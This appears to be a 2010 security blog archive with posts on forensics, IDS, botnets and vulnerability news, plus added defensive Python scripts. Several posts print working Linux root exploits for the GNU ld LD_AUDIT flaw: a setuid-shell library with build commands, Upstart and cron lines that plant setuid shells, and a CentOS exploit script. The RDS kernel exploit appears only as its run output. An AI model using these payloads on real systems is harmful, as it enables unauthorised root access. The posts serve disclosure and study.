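    Packet(100.2, "203.0.113.7", 40211, "10.0.0.5", 22, "tcp", "PA", b"SSH-2.0-evil"),
    Packet(100.3, "10.0.0.5", 22, "203.0.113.7", 40211, "tcp", "PA", b"SSH-2.0-OpenSSH_5.3"),
    Packet(101.0, "10.0.0.9", 53311, "10.0.0.1", 53, "udp", "", b"\x12\x34dns-query"),
    Packet(101.0, "10.0.0.1", 53, "10.0.0.9", 53311, "udp", "", b"\x12\x34dns-answer"),
    Packet(105.0, "203.0.113.7", 40211, "10.0.0.5", 22, "tcp", "FA", b""),
]


def session_key(proto, src, sport, dst, dport):
    """Canonical bidirectional key: identical for both directions of a session."""
    a, b = (src, sport), (dst, dport)
    return (proto,) + (a + b if a <= b else b + a)


def build_sessions(packets):
    """Summarise packets into session records: endpoints, protocol, timing,
    packets and payload bytes per direction, and the union of TCP flags seen.
    Payload content is deliberately dropped; that is what makes this scale."""
    sessions = {}
    for p in packets:
        key = session_key(p.proto, p.src, p.sport, p.dst, p.dport)
        s = sessions.get(key)
        if s is None:
            # The first packet seen defines the client side of the record.
            s = sessions[key] = {
                "proto": p.proto, "client": p.src, "cport": p.sport,
                "server": p.dst, "sport": p.dport, "start": p.ts, "end": p.ts,
                "pkts_c2s": 0, "pkts_s2c": 0, "bytes_c2s": 0, "bytes_s2c": 0,
                "flags": set(),
            }
        s["end"] = max(s["end"], p.ts)
        s["flags"].update(p.flags)
        direction = "c2s" if (p.src, p.sport) == (s["client"], s["cport"]) else "s2c"
        s["pkts_" + direction] += 1
        s["bytes_" + direction] += len(p.payload)
    return list(sessions.values())


def sessions_involving(sessions, ip):
    """The analyst's first filter: every session that touches one address."""
    return [s for s in sessions if ip in (s["client"], s["server"])]


def full_content_for(packets, session):
    """Pivot from one session record back to its full content packets."""
    key = session_key(session["proto"], session["client"], session["cport"],
                      session["server"], session["sport"])
    return [p for p in packets
            if session_key(p.proto, p.src, p.sport, p.dst, p.dport) == key]


if __name__ == "__main__":
    sessions = build_sessions(PACKETS)
    for s in sessions_involving(sessions, "203.0.113.7"):
        print(f"{s['proto']} {s['client']}:{s['cport']} -> {s['server']}:{s['sport']} "
              f"flags={''.join(sorted(s['flags']))} pkts={s['pkts_c2s']}/{s['pkts_s2c']} "
              f"duration={s['end'] - s['start']:.1f}s")
        for p in full_content_for(PACKETS, s):   # drill down only when needed
            print(f"    {p.ts:.1f} {p.flags:<3} {p.payload!r}")
```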

Statistical analysis and external indicators of a compromise
Having a good baseline of our network and equipment helps to detect unexpected changes that may be caused by an incident or an intrusion. It could be: high network traffic, servers under high load, etc.

Sometimes, this statistical analysis can be complemented by other indicators like servers or routers crashing, people complaining that an application is not working, etc. Perhaps intelligence and information gathering can also be added here: third party companies/institutions complaining about attacks from our network, a post on the Internet saying that we were compromised, possible active threats, etc.

Intrusion Detection Systems
In practice, a human cannot spot an attack in real time just by looking at the generated data. We need a tool that automates all this process, and the analyst will only validate the alerts with the available data, as already explained. In case an incident is ongoing, the analyst will escalate the alert to the CIRT (Computer Incident Response Team).

It is important to notice that we are using an IDS (Intrusion Detection System) and not an IPS (Intrusion Prevention System). Our goal is to gather enough information to understand the attacks and act accordingly. The IPS will block a possible attack but we will miss the full picture of the incident.

Friday, November 12, 2010

Tool for timeline analysis: log2timeline

log2timeline, a framework for automatic creation of a super timeline. The main purpose is to provide a single tool to parse various log files and artifacts found on suspect systems (and supporting systems, such as network equipment) and produce a timeline that can be analysed by forensic investigators/analysts.

Example of usage: introduction and solution


OSX update breaking PGP full disc encryption

Via darknet:

For the past day or so I’ve been seeing endless people tweeting about how the latest Mac OS X update b0rks your Mac if you are using PGP full disc encryption. It’s a pretty nasty bug, but thankfully it can be recovered from fairly easily.
If you are just looking for a quick solution, you can:
a) Not apply the update (as recommended by PGP)
b) Decrypt your volumes, apply the update, then re-encrypt

For the LOL:

Users of PGP’s Whole Disk Encryption for Macs got a nasty surprise when they upgraded to the latest OS X update once they discovered their systems were no longer able to reboot.

It seems that Apple and the Symantec-owned PGP suffered a near-fatal failure to communicate that 10.6.5 ships with a new EFI booter that was incompatible with the encryption software’s boot guard. As a result, the update rendered Macs using WDE as little more than expensive paperweights.

A fix was provided yesterday morning by PGP, the details are here:
Mac PGP WDE customers should not apply the recent Mac OS X 10.6.5 update

UPDATE: H security also talks about the same problem.

Physical Penetration Testing Presentation

Nice presentation given at Hack3rCon 2010

The original videos can also be found here

- Purpose and goals of the pentest
  (the customer may not know or be wrong)

  * What is running your business?

- Why?
  * attack vectors
  * evaluate the controls
  * potential vulnerabilities
  * find real threats to the organization
  * It must be a repeatable process and easy to explain
    (the methodology is important)
  * perhaps a security review can be done instead of a pentest
    (A pentest in a really insecure place is not worthwhile)

- Scope
  * which targets can you attack, and how?
  * what are you authorized to do versus real world?

- Methodologies
  * Open Source Security Testing Methodology
  * Crime Prevention Through Environmental Design

- Threat Source Analysis
  * actors
  * funding, motivation and time

- Method
  * research
  * reconnaissance (google maps :D )
  * planning
  * execution
  * extraction
  * Wrap Up

- Real world examples

- Reporting

- Getting caught by the Police :D

- Recommended reading

- Training

Wednesday, November 10, 2010

Quick introduction to shellcoding

This is just a presentation from 2007 that gives a quick introduction to shellcoding.

More info: Slides Video

Executing programs from memory with Metasploit

One of the most powerful characteristics of Metasploit is the ability to execute programs from memory, without writing files to disk.

The guys from Pauldotcom had this nice technical segment in their podcast. The video shows how to duplicate (or create multiple instances of) a Meterpreter session by injecting it into another process.

They also show how to dump the memory of a process without touching the disk.

Show notes

Monday, November 8, 2010

Escalation via a library upload and the GNU ld dlopen vulnerability

In my previous post I was trying to find ways to gain a root shell by using the dlopen vulnerability, but I could not find anything interesting because I was looking in the wrong place.

At this point, we have two facts:
  • I can create world writable files as root
  • I can load libraries that are not meant to be used by a setuid program

I was looking for ways to subvert services to gain root, when the answer was right there in the advisory.

By having the ability to upload my own evil library to the host and then execute it as described in the PoC, I can gain a root shell easily. But, since I can only load a library if it is located in a path defined in /etc/ld.so.conf, I have to find a way to copy my library to a valid directory, which is going to be owned by root.

Well, the solution to this problem is to make use of the vulnerability to create a world writable file in one of those paths (e.g. /lib) and then overwrite it with the contents of the library.

Once the library is in place, we only need to make use of the vulnerability again to load it, get a root shell and then secure our access to the system.

The library is really simple. It only defines a constructor, which is executed when the setuid program loads it.

#include <errno.h>
#include <unistd.h>

/* Constructor: ld.so runs it as soon as the library is loaded,
   before main() of the (setuid) program gets control. */
static void
__attribute__ ((constructor))
install (void)
{
  execl("/bin/sh", "/bin/sh", (char *) 0);
}

At this point, we only have to compile the library and follow the steps explained before:

umask 0
gcc -c -fPIC evil.c -o evil.o
gcc -shared -Wl,-soname,libevil.so.1 -o libevil.so evil.o
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libevil.so" ping
cat ./libevil.so > /lib/libevil.so
LD_AUDIT="libevil.so" ping

As a result, we have a root shell:

user@host:~/$ sh run.sh
ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface]
            [-M pmtudisc-hint] [-m mark] [-S sndbuf]
            [-T tstamp-options] [-Q tos] [hop1 ...] destination
# whoami

Note: this attack has been tested on an unpatched Ubuntu 10.10.

Friday, November 5, 2010

Privilege escalation with Upstart and the GNU ld dlopen vulnerability

As I wrote in the previous post, GNU ld dlopen privilege escalation, we can create world writable files owned by root. The advisory states that we can create a file in /etc/cron.d/, and thus gain root privileges by creating an entry that drops a setuid root shell, but this is not the case because Cron checks the permissions and does not allow crontabs with write permission for the group or for others.

Gaining root access is not easy because the files get created without the execute flag (umask can only remove permission bits, not add them). So, as a simple example, we cannot put a file in the PATH that impersonates a legitimate binary while it drops a suid shell somewhere in the file system.

There are not many places in a Unix system where we can put a file that is going to be parsed (not executed) by an application running as root and that, at the same time, allows executing arbitrary commands (Cron is not one of them, as commented above).

An option could be to create the files /etc/profile or /etc/bashrc if they do not exist, because they are sourced by bash when root logs into the server, but they already exist in many systems and the PoC creates files but does not change permissions.

I have found out that Upstart, which is used by many distributions, does not check the permissions when reading its configuration files, and it offers directives to execute binaries (like getty, anacron, etc.). This way, thanks to the vulnerability in GNU ld, the attacker can create a configuration file that instructs Upstart to drop a suid root shell at boot time.

Privilege escalation

The following example only applies to Ubuntu, but it can be adapted to other distributions.
- The Upstart configuration files are located in the /etc/init directory and named XXX.conf
- The directory is owned by root with 755 permissions

The attacker has to create the file /etc/init/tty7.conf by executing the PoC and then write the following content into it.
start on runlevel [12345]
exec /bin/bash -c "chown root.root /home/msk/exploit/shell ; chmod u+s /home/msk/exploit/shell"
Where /home/msk/exploit/shell is a binary that calls setuid(0)/setgid(0) and then executes /bin/sh.

After rebooting, /home/msk/exploit/shell will be a binary owned by root with the setuid permission set.
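Both this post and the library-upload one above rely on the same symptom: a root-owned directory ends up holding a world-writable file that a root-run program (Upstart, ld.so) then trusts. The audit below is an added example, not code from the posts: it checks such directories for world-writable or non-root-owned regular files and, for Upstart job files, reports the stanzas that would run commands. The directory list is an assumed default and the sample tree built in demo() is constructed.

```python
"""Audit the directories that root-run programs trust for planted files.

Added example, not code from the posts.  The dlopen bug lets a user create
root-owned, world-writable files; cron rejects such crontabs, Upstart does
not, and ld.so will happily load a library dropped into /lib."""
import os
import shutil
import stat
import tempfile

# Assumed default list covering the locations the posts discuss; adjust per distro.
DEFAULT_DIRS = ["/etc/cron.d", "/etc/init", "/lib", "/etc/ld.so.conf.d"]
# Upstart stanzas that make a job execute something.
UPSTART_EXEC_STANZAS = ("exec", "script", "pre-start", "post-start",
                        "pre-stop", "post-stop")

def upstart_commands(path):
    """Return the lines of an Upstart job file that start an executing stanza."""
    found = []
    try:
        with open(path, "r", errors="replace") as fh:
            for line in fh:
                word = line.strip().split(" ", 1)[0]
                if word in UPSTART_EXEC_STANZAS:
                    found.append(line.strip())
    except OSError:
        pass
    return found

def audit_dir(directory, trusted_uid=0):
    """Return (path, reason) for regular files in `directory` that are
    world-writable or not owned by `trusted_uid`."""
    findings = []
    try:
        names = sorted(os.listdir(directory))
    except OSError:
        return findings                     # directory absent on this system
    for name in names:
        full = os.path.join(directory, name)
        try:
            st = os.lstat(full)             # lstat: never follow a planted symlink
        except OSError:
            continue
        if not stat.S_ISREG(st.st_mode):
            continue
        if st.st_mode & stat.S_IWOTH:
            reason = "world-writable (mode %04o)" % stat.S_IMODE(st.st_mode)
        elif st.st_uid != trusted_uid:
            reason = "owned by uid %d, not uid %d" % (st.st_uid, trusted_uid)
        else:
            continue
        if name.endswith(".conf"):          # Upstart job: say what it would run
            cmds = upstart_commands(full)
            if cmds:
                reason += "; Upstart job runs: " + " | ".join(cmds)
        findings.append((full, reason))
    return findings

def audit(dirs=DEFAULT_DIRS, trusted_uid=0):
    """Audit every directory in `dirs` and concatenate the findings."""
    findings = []
    for directory in dirs:
        findings.extend(audit_dir(directory, trusted_uid))
    return findings

def demo():
    """Constructed /etc/init look-alike in a temp dir: one planted job with
    mode 0666 (what the dlopen bug with umask 0 produces) and one legitimate
    job.  Returns the findings, which should name only the planted one."""
    base = tempfile.mkdtemp(prefix="upstart-audit-")
    planted = os.path.join(base, "tty7.conf")
    with open(planted, "w") as fh:
        fh.write("start on runlevel [12345]\nexec /bin/true\n")
    os.chmod(planted, 0o666)
    legit = os.path.join(base, "tty1.conf")
    with open(legit, "w") as fh:
        fh.write("start on runlevel [23]\nexec /sbin/getty -8 38400 tty1\n")
    os.chmod(legit, 0o644)
    findings = audit_dir(base, trusted_uid=os.getuid())
    shutil.rmtree(base, ignore_errors=True)
    return findings

if __name__ == "__main__":
    for path, why in audit():
        print(path, "->", why)
```

Run it as root on a real box to audit the default list; demo() only exercises the logic on a throwaway directory.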

Thursday, November 4, 2010

Analysis techniques in image forensics

Nice post from the Windows Incident Response blog that describes several techniques for analyzing disk images.

Timeline analysis
This is a great analysis technique to use due to the fact that when you build a timeline from multiple data sources on and from within a system, you give yourself two things that you don't normally have through more traditional analysis techniques...context, and a greater relative level of confidence in your data.
As to the overall relative level of confidence in our data, we have to understand that all data sources have a relative level of confidence associated with each of them. For example, from Chris's post, we know that the relative confidence level of the time stamps within the $STANDARD_INFORMATION attributes within the MFT (and file system) is (or should be) low. That's because these values are fairly easily changed, often through "time stomping", so that the MACB times (particularly the "B" time, or creation date of the file) do not fall within the initial timeframe of the incident. However, the time stamps within the $FILE_NAME attributes can provide us with a greater level of confidence in the data source (MFT, in this case). By adding other data sources (Event Log, Registry, Prefetch file metadata, etc.), particularly data sources whose time stamps are not so easily modified (such as Registry key LastWrite times), we can elevate our relative confidence level in the data.
Note: The SANS Computer Forensic blog talks about the same subject.

It makes sense, because an analyst cannot trust only a single source of information. We must correlate multiple data sources in order to get the full picture (context) and spot possible manipulations.

Timeline Creation
On systems with a lot of noise it does not make sense to create a full timeline, because the background noise may cause you more problems than targeting only the areas you are interested in.
However, there is a method to my madness, which can be seen in part in Chris's Sniper Forensics presentation. I tend to take a targeted approach, adding the information that is necessary to complete the picture. For example, when analyzing a system that had been compromised via SQL injection, I included the file system metadata and only the web server logs that contained the SQL injection attack information. There was no need to include user information (Registry, index.dat, etc.); in fact, doing so would have added considerable noise to the timeline, and the extra data would have required significantly more effort to analyze and parse through in order to find what I was looking for.
Feedback loop
Use a knowledge database updated with findings in your previous investigations. Also, sharing information within a team is vital to achieve the goals and be more efficient.

There are also some comments about RegRipper,

RegRipper is a Windows Registry data extraction and correlation tool. RegRipper uses plugins (similar to Nessus) to access specific Registry hive files in order to access and extract specific keys, values, and data, and does so by bypassing the Win32API.

This tool can help to automate some analysis of the registry that could indicate compromises, the presence of malware, etc., with the help of the knowledge database.

The Botnet Wars: a Q&A

Interesting article that describes how botnets and the underground market work.
In today’s article (which will be a Q&A, a question & answer), I hope to be able to clear up the mystery behind these kits. I have been able to interview experts in the anti-malware world. They will each give their opinion on this particular subject.

Wednesday, November 3, 2010

w3af 1.0-rc4 available

Andres Riancho has announced that a new version of w3af is available.

Just to name a few things we've done for this release:
* We've written new HOWTO documents for our users
* Considerably improved the speed of all grep plugins
* Replaced Beautiful Soup by the faster libxml2 library
* Introduced the usage of XPATH queries that will allow us to improve performance and reduce false positives
* Fixed hundreds of bugs
On this release you'll also find that after exploiting a vulnerability you can leverage that access using our Web Application Payloads, a feature that we developed together with Lucas Apa from Bonsai Information Security. These payloads allow you to escalate privileges and will help you get from a low privileged vulnerability (e.g. local file read) to a remote code execution. In order to try them, exploit a vulnerability, get any type of shell and then run any of the following commands: help, lsp, payload tcp (the last one will show you the open connections in the remote box).

Detecting time stamp manipulations in the file system

Awesome article from SANS computer forensics blog entitled Digital Forensics: Detecting time stamp manipulation.

The post describes how to spot time stamp manipulations when performing a forensic analysis.

The NTFS file system stores the time stamps in two different attributes ($STANDARD_INFORMATION and $FILE_NAME), and both have the fields Modification, Accessed, Change and Born.

Dave Hull used the $FILE_NAME attribute to spot the time stamp manipulations that may be done by tools like timestomp or Metasploit.

$FILE_NAME is not a standard attribute that can be extracted with all forensics tools, but Mark McKinnon has written a tool called mft_parser (not released yet) that can do that.

mft_parser_cl <MFT> <db> <bodyfile> <mount_point> 
The “db” argument is the name of a sqlite database that the tool creates, “bodyfile” is similar to the bodyfile that fls from Brian Carrier’s The Sleuth Kit produces, except that it will also include time stamps from NTFS’ $FILE_NAME attribute. The “mount_point” argument is prefixed to the paths in the bodyfile, so if you’re running this tool against a drive image that was drive C, you can provide “C” as an argument.

Bodyfile: listing of files and directories in a file system, with its time stamps.
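A small checker for the heuristic described above, written here as an added example (not code from the SANS post or from mft_parser): it reads a TSK-style bodyfile that carries both attributes and flags files whose $STANDARD_INFORMATION times fall before the $FILE_NAME Born time. The " ($FILE_NAME)" suffix marking the $FILE_NAME rows is an assumption, and the sample rows are constructed.

```python
"""Timestomp heuristic over a bodyfile that carries both NTFS attributes.

$FILE_NAME times are not settable through the normal Win32 API, so a file
whose $STANDARD_INFORMATION (SI) times fall before its $FILE_NAME (FN) Born
time was almost certainly back-dated.  Added example, not code from the SANS
post or from mft_parser."""
from collections import defaultdict

# Assumption: rows for the $FILE_NAME attribute carry this suffix in the
# name field.  Column order is the TSK 3.x bodyfile one:
# MD5|name|inode|mode|UID|GID|size|atime|mtime|ctime|crtime
FN_SUFFIX = " ($FILE_NAME)"

# Constructed sample: a legitimate DLL (SI and FN agree), a planted DLL whose
# SI times were stomped back to 2000-01-01, and a file without an FN row.
SAMPLE_BODYFILE = """\
0|C:/Windows/system32/kernel32.dll|1001|r/rrwxrwxrwx|0|0|989696|1288000000|1287990000|1287990000|1287980000
0|C:/Windows/system32/kernel32.dll ($FILE_NAME)|1001|r/rrwxrwxrwx|0|0|989696|1287980000|1287980000|1287980000|1287980000
0|C:/Windows/system32/planted.dll|4242|r/rrwxrwxrwx|0|0|54272|946684800|946684800|946684800|946684800
0|C:/Windows/system32/planted.dll ($FILE_NAME)|4242|r/rrwxrwxrwx|0|0|54272|1288100000|1288100000|1288100000|1288100000
0|C:/Users/msk/notes.txt|7|r/rrwxrwxrwx|0|0|120|1288200000|1288200000|1288200000|1288200000
"""

def parse_bodyfile(text):
    """Group bodyfile rows by path: {path: {"SI": MACB dict, "FN": MACB dict}}."""
    entries = defaultdict(dict)
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split("|")
        if len(fields) != 11:
            continue                      # malformed row, skip it
        name, attr = fields[1], "SI"
        if name.endswith(FN_SUFFIX):
            name, attr = name[:-len(FN_SUFFIX)], "FN"
        atime, mtime, ctime, crtime = (int(v) for v in fields[7:11])
        # Keep the MACB naming the post uses: Modified, Accessed, Changed, Born.
        entries[name][attr] = {"M": mtime, "A": atime, "C": ctime, "B": crtime}
    return entries

def find_timestomped(entries):
    """Return [(path, reason)] for files with an SI time earlier than FN Born.

    A file cannot be modified, accessed or changed before it was created,
    and FN Born is the creation time that user-mode tools cannot rewrite."""
    hits = []
    labels = {"B": "born", "M": "modified", "A": "accessed", "C": "changed"}
    for path, attrs in sorted(entries.items()):
        si, fn = attrs.get("SI"), attrs.get("FN")
        if not si or not fn or not fn["B"]:
            continue                      # need both attributes to compare
        for key in "BMAC":
            # 0 means "unknown" in TSK output, so never compare against it.
            if si[key] and si[key] < fn["B"]:
                hits.append((path, "$SI %s %d < $FN born %d"
                             % (labels[key], si[key], fn["B"])))
                break
    return hits

def scan(text):
    """Convenience wrapper: bodyfile text in, list of suspicious files out."""
    return find_timestomped(parse_bodyfile(text))

if __name__ == "__main__":
    for path, reason in scan(SAMPLE_BODYFILE):
        print("%s: %s" % (path, reason))
```

Feed it the bodyfile produced by mft_parser_cl (or any tool that emits both attributes) and review the hits against the rest of the timeline, since a legitimate clock change can also produce them.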

ProFTPD preauth remote buffer overflow

TippingPoint, under the Zero Day Initiative, has published a preauth remote overflow in ProFTPD.

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ProFTPD. Authentication is not required to exploit this vulnerability. 
The flaw exists within the proftpd server component which listens by default on TCP port 21. When reading user input if a TELNET_IAC escape sequence is encountered the process miscalculates a buffer length counter value allowing a user controlled copy of data to a stack buffer. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the proftpd process.

Welcome back to the 90's! This smells like a  classic exploit :D

UPDATE: the exploit has been published, as well as the advisory from the Zero Day Initiative.

Emerging Threats under DDoS

As Matthew Jonkman comments in the emerging-sigs mailing list, Emerging Threats has been under a DDoS attack since November 1st, but the rule distribution is not affected.

Still taking a DDoS, but we have a good idea who it is. For the time being do NOT visit emergingthreats.net. http://www.emergingthreats.net is fine, but will be down for a while yet likely.
Rules are unaffected, make sure you're downloading from rules.emergingthreats.net.
Thanks for everyone's support. We're doing something right if they're spending time on us. Rally the troops! Keep up the fight!

Thursday, October 28, 2010

Wednesday, October 27, 2010

Firefox 0day was found on the Nobel Peace Prize website

A hidden iframe on nobelpeaceprize.org was exploiting a Firefox 0day vulnerability via an exploit-pack.

According to Einar Oftedal, a detection executive at Norman ASA in Oslo, the official website for the Nobel Peace prize, nobelpeaceprize.org, was compromised so that it contained an iframe link to a malicious server.
“This iframe has a multi exploit backend and serves exploits for Firefox, including a working remote exploit for firefox 3.6.11,” he said in an instant message to The Register. “We didn't see any 0day for IE,” he added, referring to Microsoft's browser.

More information:
Information Security News mailing list

Tuesday, October 26, 2010

FUD in the IDS market

There has been a lot of FUD going on in the IDS/IPS market. Stonesoft has launched a campaign saying that their product is the only one able to stop some advanced attacks that are not public.

I am not an expert in the field, but there are two things that worry me:

  • Somebody saying that they can stop all the advanced attacks with "anti evasion techniques", but there are no details whatsoever.
  • None of the competitors are able to achieve the same results.
For me, it looks like nasty FUD trying to gain some market share in the short term, but history has demonstrated that it is a bad strategy.

Anyway, I always trust people that openly discuss the problems, like researchers and open source developers.

Some comments from SourceFire
Some lolz from Daily Dave mailing list

Monday, October 25, 2010

Nessus scan through a socks Meterpreter pivot

Great article from digininja.org that explains how to scan a target network with Nessus through a Meterpreter session.

It is achieved by setting up a pivot and using the auxiliary/server/socks4a module. Since the Nessus server does not natively support SOCKS, we have to use a wrapper like proxychains or socksify, as explained in the article.

Friday, October 22, 2010

GNU ld dlopen privilege escalation

For the second time this week, Tavis Ormandy has sent a 'bomb' to the full-disclosure list, in the form of a Linux privilege escalation with GNU ld.

In a nutshell, the problem is the following. The ld.so manual page says about LD_PRELOAD:
A whitespace-separated list of additional, user-specified, ELF shared libraries to be loaded before all others. This can be used to selectively override functions in other shared libraries. For set-user-ID/set-group-ID ELF binaries, only libraries in the standard search directories that are also set-user-ID will be loaded.
But this is not the case with LD_AUDIT. Basically, you can load any library when executing a suid program, and it will be executed with root permissions! The attack consists in finding an arbitrary library that writes a file to disk; when loaded through a suid program, that file will be owned by root.

The final trick is that the newly created process inherits the parent's umask. What does it mean? We can change the umask in our shell and then create a world writable file with root rights!

A regular user being able to write files with root permissions is really a bad thing... It means that you can create an arbitrary shell script that will be executed by Cron with root rights. Yes, an instant root shell in the system!

The attack:

$ umask 0
#arbitrary suid program
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
# This library writes a file to disk when the PCPROFILE_OUTPUT
# environment variable is defined.
# There is another example with the liblftp-tasks library and
# the LFTP_HOME environment variable.
$ printf "* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit\n" > /etc/cron.d/exploit
# Create an arbitrary but valid crontab(5) line in the file and wait for the execution.
# This attack creates a suid shell named /tmp/exploit.
$ /tmp/exploit
# whoami

UPDATE: Using crontab files is not an option because Cron does not accept files that are group or world writable. The attacker must look for other options.

UPDATE: It is possible to upload an arbitrary library that will be loaded with root privileges, dropping a root shell.

Thursday, October 21, 2010

Integrating Hydra with Nessus

Nice video from Paul Asadoorian in the Tenable Security blog.

The blog post discusses how to integrate Hydra with Nessus to run brute force attacks against your infrastructure: installing Hydra and configuring Nessus.

The post also points to different good resources to get your list of users and passwords that will be used to perform the brute force attack.

Malware Pushers Abuse Firefox Warning Page

Nice post from Darknet that discusses a new technique used by attackers to trick the user into installing scareware.

I quote,

Hackers have subverted warnings generated by Firefox about dangerous sites to punt fake anti-virus portals.
Surfers straying onto a web page offering the “Security Tool” rogue anti-virus are offered a warning page that convincingly mimics the genuine Firefox block page. The site offers supposed updates for Mozilla’s technology that are actually scareware packages.
If Windows users apply these updates they will be falsely warned that their system is infected and continuously nagged into buying worthless scareware packages that serve only to line the pockets of cyber-scammers.
The rogue application will automatically attempt to install itself on the machines of prospective marks in cases where scripts are enabled, net security firm F-Secure warns.
Definitely, it is a really clever social engineering attack that tricks the users into thinking that they just got infected and that they have to install this new antivirus, which is already alerting about infections.

Persistence Registry keys and Windows Incident Response

The SANS Computer Forensics blog discusses how to query certain registry keys to find secondary indicators of a compromise.

Dave Hull has created a list of registry keys that can be used to run malware at boot time. He used AutoRuns from Microsoft Sysinternals to pull the list of registry keys.

The lists of keys are available:

XPSP3_HKCU_Startup_Locations.txt - cannot be remotely queried
XPSP3_HKLM_Startup_Locations.txt - can be remotely queried

Privilege escalation in the Linux kernel

H Security has reported the second privilege escalation in Linux this week (the first was the error in the GNU ld linker), CVE-2010-3904.

They point to the advisory as well as the PoC.

On October 13th, VSR identified a vulnerability in the RDS protocol, as implemented in the Linux kernel. Because kernel functions responsible for copying data between kernel and user space failed to verify that a user-provided address actually resided in the user segment, a local attacker could issue specially crafted socket function calls to write arbitrary values into kernel memory. By leveraging this capability, it is possible for unprivileged users to escalate privileges to root. 

I have tested it in an old Ubuntu 10.10 RC vmware image and it worked.
Ubuntu's advisory published on October 19th.

msk@ubuntu:~$ gcc -o test linux-rds-exploit.c
msk@ubuntu:~$ ./test
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved rds_proto_ops to 0xe09d6a40
 [+] Resolved rds_ioctl to 0xe09d0000
 [+] Resolved commit_creds to 0xc016c340
 [+] Resolved prepare_kernel_cred to 0xc016c790
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# id
uid=0(root) gid=0(root) groups=0(root)

I have checked the advisory published by RedHat and it seems that RHEL is not affected (RHEL 3 and 4 for sure), or I did not manage to make it work.

Debian seems to have a vulnerable kernel only in unstable (squeeze) and sid. The advisory marks all the versions as vulnerable, but that should be false because stable and backports do not support RDS.

Wednesday, October 20, 2010

Honeypot for vulnerable web applications

The Honeynet Project informs that GlastopfNG has been released. GlastopfNG is a honeypot that simulates vulnerable web servers/applications to fully understand the attacks.

GlastopfNG is a honeypot specialized on simulating a vulnerable web server/application to become a target of automated and even manual attacks. Instead of trying to block these attacks GlastopfNG tries to get as much information as possible about the attacker and the used attack itself. This gathered information can then be used in different ways to protect real applications in the future against such attacks. Today it's for example already used by hosting providers to inform owners of servers, which are attacking other servers on the Internet, that it's very likely, that their server has been hacked. This is a great additional service for their customers and can be done in a mainly automated way.

More information available in the paper.
It can be downloaded from here.

Presentation about botnets in SIGINT'10, Koln

SIGINT'10 took place between the 22nd and the 24th of May in Koln, Germany. The videos are also available and hosted by ccc.

I just saw the presentation made by Thorsten Holz and called 'Botnets in 2010 - Status Quo and Future Threats'.

As a quick summary, it gives a short introduction to botnets and their architecture and then talks about Storm Worm and Waledac.

Storm Worm
  • Not centralized C & C thanks to p2p
  • Fast flux domains
  • Uses infected computers with public IP addresses to proxy the content back to the backend: spam pages or with exploit packs. It is hard to track  and offers high availability.
  • The NATed machines are used to send spam and launch DoS attacks.
  • Template based spamming. The template is sent to the bots that then send the spam.
  • Mitigation: join the network and disrupt the communication channel between the bots (Stormfucker in 25c3 CCC)

Waledac
  • Successor of Storm Worm and perhaps created by the same group
  • Uses HTTP to tunnel traffic (major change) between the NATed machines and the repeaters
  • multi-tier architecture ('hybrid' p2p), like storm worm
  • Static backend servers that host the content
  • Fast flux domains for C&C
  • Template based spamming.
  • The mitigation effort was called 'Operation b49' and took down the botnet in February 2010.

The video can be found here.

Tuesday, October 19, 2010

Java being massively exploited

Yes, not only Adobe is being targeted in Windows platforms even though they are making things easy for the black hats :D

As Brian Krebs says, Microsoft is warning about attacks against Java, with vulnerabilities that date back to 2008 (I have investigated attacks that used vulnerabilities patched back in 2006 and continue to be very effective)!

CVE-2008-5353 - 1,196,480 computers infected.
CVE-2009-3867 - 1,119,191 computers infected
CVE-2010-0094 -   173,123 computers infected.

Microsoft says that it kind of makes sense because Java is widely installed and nobody thinks to update it, like Adobe Acrobat. So, it is a nice candidate to be added to exploit packs and get a nice infection rate ;)

GNU ld privilege escalation

From this post on the full-disclosure list I learned about the privilege escalation in the GNU ld linker.

Somehow, it seems to be RedHat-centric, or I didn't manage to make it work in Debian/Ubuntu.

This is the exploit being executed on an up-to-date CentOS 5.5:

bash-3.2$ ls
exploit  payload.c  test.sh
bash-3.2$ cat test.sh
rm -rf /tmp/exploit
mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
rm -rf /tmp/exploit/
gcc -w -fPIC -shared -o /tmp/exploit payload.c
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

bash-3.2$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody) context=root:system_r:unconfined_t:SystemLow-SystemHigh
bash-3.2$ sh test.sh
[root@localhost tmp]# cat /etc/redhat-release
CentOS release 5.5 (Final)
[root@localhost tmp]# id
uid=0(root) gid=99(nobody) groups=99(nobody) context=root:system_r:unconfined_t:SystemLow-SystemHigh
[root@localhost tmp]#

It does not seem to work in Ubuntu 10.10:

msk@ubuntu:/tmp$ sudo sysctl -w kernel.yama.protected_sticky_symlinks=0
kernel.yama.protected_sticky_symlinks = 0
msk@ubuntu:/tmp$ sudo sysctl -w kernel.yama.protected_nonaccess_hardlinks=0
kernel.yama.protected_nonaccess_hardlinks = 0
msk@ubuntu:/tmp$ sh test.sh
Inconsistency detected by ld.so: dl-open.c: 232: dl_open_worker: Assertion `(call_map)->l_name[0] == '\0'' failed!

Resources for Building Incident Response Teams

Richard Bejtlich posts some resources for building an Incident Response Team.

New version of Metasploit Unleashed

The guys from Offensive Security have updated their online course, Metasploit Unleashed.

You can find more information in their blog post.

Friday, October 15, 2010

Windows hardening: EMET

EMET (Microsoft's Enhanced Mitigation Experience Toolkit) is a tool that enables security features that are not enabled by default for applications. Unfortunately, Windows lets each application choose which security features should be enabled by setting specific flags, so many attacks can succeed even though the protections are available in the operating system.

In a nutshell, EMET is a DLL that allows enabling security features at runtime for applications that were compiled without them, like DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization).

You can find more information about this tool as well as examples in this article from H Security.

